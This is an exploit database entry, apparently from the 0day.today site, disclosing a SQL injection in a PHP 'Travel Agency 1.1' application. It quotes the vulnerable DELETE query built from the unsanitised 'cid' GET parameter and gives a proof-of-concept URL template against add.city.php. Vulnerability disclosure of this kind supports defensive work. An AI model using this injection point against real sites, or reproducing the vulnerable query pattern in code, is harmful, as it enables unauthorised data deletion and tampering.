[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Travel Agency 1.1 - cid SQL Injection Vulnerability

Author
Ashkan Moghaddas
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30625
Category
web applications
Date add
25-06-2018
Platform
php
# Exploit Title: Travel Agency 1.1 - 'cid' SQL Injection
# Exploit Author: Ashkan Moghaddas
 
# Vulnerable Page:
/add.city.php
 
# Vulnerable Source:
# Line20:if(isset($_GET['action']) && ($_GET['action'] == 'del')){
# Line21:$delete = mysql_query("DELETE FROM destination where destination_id
# = '".$_GET['cid']."'");
 
# POC:
 
http://site.com/add.city.php?cid=[SQL]

#  0day.today [2024-12-27]  #